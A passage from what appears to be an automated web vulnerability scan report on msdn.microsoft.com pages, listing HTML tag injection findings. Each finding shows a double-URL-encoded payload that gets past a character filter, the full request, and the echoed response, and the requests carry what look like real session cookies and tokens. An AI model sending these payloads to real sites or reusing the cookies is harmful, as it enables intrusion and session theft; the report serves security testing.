17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usaa9e1"><a>80d9957f887/library/ee721044" />
...[SNIP]...

2.94. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee721044.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2341c%2522%253e%253ca%253efc838b46606 was submitted in the REST URL parameter 2. This input was echoed as 2341c"><a>fc838b46606 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library2341c%2522%253e%253ca%253efc838b46606/ee721044.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2341c"><a>fc838b46606/ee721044" />
...[SNIP]...

2.95. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee721044.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0813%2522%253e%253ca%253e5bed963aadc was submitted in the REST URL parameter 3. This input was echoed as a0813"><a>5bed963aadc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ee721044.aspxa0813%2522%253e%253ca%253e5bed963aadc HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee721044.aspxa0813"><a>5bed963aadc" />
...[SNIP]...

2.96. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee725279.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36289%2522%253e%253ca%253eae7249556c5 was submitted in the REST URL parameter 1. This input was echoed as 36289"><a>ae7249556c5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us36289%2522%253e%253ca%253eae7249556c5/library/ee725279.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us36289"><a>ae7249556c5/library/ee725279" />
...[SNIP]...

2.97. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee725279.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e35f%2522%253e%253ca%253e9fb18031369 was submitted in the REST URL parameter 2. This input was echoed as 9e35f"><a>9fb18031369 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library9e35f%2522%253e%253ca%253e9fb18031369/ee725279.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9e35f"><a>9fb18031369/ee725279" />
...[SNIP]...

2.98. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee725279.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 919d4%2522%253e%253ca%253e262395ba879 was submitted in the REST URL parameter 3. This input was echoed as 919d4"><a>262395ba879 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ee725279.aspx919d4%2522%253e%253ca%253e262395ba879 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee725279.aspx919d4"><a>262395ba879" />
...[SNIP]...

2.99. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff361664.aspx

Issue detail

The value of REST URL parameter 1 (the first path segment, en-us) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the request is redirected to the site's error page, which writes the requested path into the aspxerrorpath portion of the hidden fromPage input's value attribute. The payload 2d5fa%2522%253e%253ca%253ee12a11fc95d was submitted appended to REST URL parameter 1. This input was echoed as 2d5fa"><a>e12a11fc95d in the application's response, closing the attribute and the input tag and injecting a new <a> tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful, so the High severity rests on confirmed tag injection rather than demonstrated script execution. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks, but it evidently URL-decodes the path a second time after the web server has already decoded it once, so the filter only ever sees the single-decoded %22, %3e and %3c. This can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character (the payload above uses %2522, %253e and %253c for ", > and <).

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode; removing the extra decode closes the double-encoding bypass. Independently of that, the path must be HTML-attribute-encoded (at minimum ", <, > and &) at the point where it is written into the fromPage value attribute, so that no decoded input can terminate the attribute. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us2d5fa%2522%253e%253ca%253ee12a11fc95d/library/ff361664.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
